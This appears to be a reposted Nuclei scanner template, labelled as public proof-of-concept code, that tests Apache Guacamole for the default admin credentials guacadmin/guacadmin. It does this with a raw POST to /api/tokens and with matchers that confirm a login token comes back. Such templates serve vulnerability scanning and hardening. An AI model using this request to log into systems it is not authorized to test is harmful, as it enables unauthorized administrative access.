guacamole-default-login: Guacamole Default Login

漏洞描述

Guacamole default admin login credentials were detected.

PoC代码[已公开]

id: guacamole-default-login

info:
  name: Guacamole Default Login
  author: r3dg33k
  severity: high
  description: Guacamole default admin login credentials were detected.
  reference:
    - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: guacamole,default-login,vuln

http:
  - raw:
      - |
        POST /api/tokens HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{Hostname}}
        Referer: {{Hostname}}

        username={{username}}&password={{password}}

    payloads:
      username:
        - guacadmin
      password:
        - guacadmin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username"'
          - '"authToken"'
          - '"guacadmin"'
        condition: and

      - type: word
        words:
          - 'application/json'
        part: header

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b7e92db41c5e7d76773227a077fe113a0ed5964a84085b394a06dbf8bd54dd19022063c29d5bd23463a2c6a9ef8104631e7e46fcf5d60b19c4d97ca4b58d87acdfc1:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/guacamole/guacamole-default-login.yaml